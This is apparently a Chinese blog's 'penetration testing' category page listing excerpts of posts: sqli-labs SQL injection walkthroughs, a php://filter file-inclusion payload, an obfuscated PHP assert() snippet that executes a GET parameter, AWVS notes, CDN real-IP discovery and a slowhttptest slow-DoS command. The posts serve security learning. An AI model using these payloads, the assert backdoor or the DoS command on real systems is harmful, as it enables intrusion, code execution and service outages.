渗透测试
文章平均质量分 69
复古追月
生活不只是眼前的苟且,还有诗和远方。。。
展开
-
SQL注入分析-less-26
SQL注入分析-less-26近期在学习SQL注入的知识,在此呢,写篇博客记录一下手工注入的过程,中间走的弯路呢就不多提了,主要把自己成功注入的过程和结果在此做一个记录,不喜勿喷哈!1、按照提示,在地址栏输入参数http://192.168.88.129/sqli-labs-master/Less-26/?id=1结果如下,正常回显:使用单引号看看页面会报什么信息:http://192.168.88.129/sqli-labs-master/Less-26/?id=1’从这里判断原创 2021-02-15 21:30:04 · 1235 阅读 · 0 评论 -
SQL注入分析-Less-27a
SQL注入分析-Less-27a1、 概述:此关的名称GET-Blind Based-All your UNION & SELECT Belong to us-Double Quotes,中文名称是基于GET型的盲注—构造你自己的union和select—双引号注入,从题目名称来看,推测这关是盲注,无法通过报错信息来获取所需要的数据,只能通过盲注的方式,这里我想的是通过布尔盲注的方式来获取信息,同时要通过技巧绕过UNION和SELECT查询语句,而且拼接过程中需要使用双引号进行闭合。2、根据猜想原创 2021-02-19 13:59:30 · 290 阅读 · 0 评论 -
SQL注入分析-less-27
SQL注入分析-less-27**1、 概述:**从本篇开始,后续都会写个概述,简单描述一下对题目的理解,本关的题目是 GET-Error Based-All your UNION&SELECT Belong to us-String-Single quote 中文名称,基于GET型的报错-构造属于你自己的UNION和SELECT-单引号字符型的注入,从名字上来看,这关需要通过报错信息来获取库名、表名、列名和对应字段(列)的数据,同时应该是对单引号敏感。2、 尝试一下我们的猜想,按照提示,输入参原创 2021-02-18 21:10:30 · 1528 阅读 · 1 评论 -
SQL注入分析-less-26a
SQL注入分析-less-26a1、还是按照提示,在地址栏输入参数。http://192.168.88.129/sqli-labs-master/Less-26a/?id=1正常回显,结果如下:2、SQL注入的一般做法,还是输入单引号试试。http://192.168.88.129/sqli-labs-master/Less-26a/?id=1%27这里没有返回结果,也没有报错信息,有两种可能性,一种可能性是查询条件错误;另一种可能性是单引号导致SQL语句没有正常闭合,因为这关利用的原创 2021-02-16 15:46:49 · 341 阅读 · 2 评论 -
PHP文件包含漏洞
file=php://filter/read=convert.base64-encode/resource=index.phpphp://filter/是一种访问本地文件的协议,/read=convert.base64-encode/表示读取的方式是base64编码后,resource=index.php表示目标文件为index.php。通过传递这个参数可以得到index.php的源码,下面说...原创 2019-06-27 16:38:31 · 281 阅读 · 0 评论 -
BugkuCTF成绩单查询
SQL注入https://blog.csdn.net/Langtuteng17/article/details/80666660转载 2019-06-27 17:39:45 · 727 阅读 · 0 评论 -
assert()代码执行漏洞
<?php $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) ?>使用?s=print_r(scandir('./'))进行目录扫描以发现代码的执...原创 2019-07-01 15:56:59 · 3199 阅读 · 0 评论 -
正则表达式求解
1.概述正则表达式的基础知识在互联网上已经出了很多教程,这里不作细致阐述,有兴趣的同学可以去以下站点学习:1.菜鸟教程:https://www.runoob.com/regexp/regexp-syntax.html2.博客:https://www.cnblogs.com/zery/p/3438845.html以上教程都说的挺好的,看了以后能帮助你理解正则的相关知识点。此篇文章的重点是教...原创 2019-07-19 16:06:08 · 293 阅读 · 0 评论 -
AWVS使用教程
AWVS可以用来:Site Crawler:爬取URLTarget Finder:IP端口扫描Subdomain Scanner:用DNS进行域名解析,找域名下的子域及其主机名Blind SQL Injector:在相应参数位置按+添加注入点,让AWVS进行注入探测,可以dump有sql漏洞的数据库内容HTTP Editor:BP repeater类似,可以进行手动漏洞挖掘探测HTT...原创 2019-07-06 10:38:10 · 3711 阅读 · 0 评论 -
CDN加速的域名如何查找真实IP
步骤一:通过该站点查找域名解析的历史记录:https://toolbar.netcraft.com/site_report?url=`xxx.xxx.com`步骤二:通过C段扫描来查找其真实的IP地址。原创 2019-07-09 14:09:22 · 2815 阅读 · 0 评论 -
SlowHTTPTest-慢速DDoS攻击
1.工具:slowhttptest2.使用方法(命令):slowhttptest -c 1000 -H -i 10 -r 200 -t GET -u https://yourtarget.com/index.html -x 24 -p 33.参数介绍:-c connections目标连接数(1000)-H slow headers 攻击,缓慢发送\r\n,让服务器一直等待-i sec...原创 2019-07-12 17:07:34 · 923 阅读 · 0 评论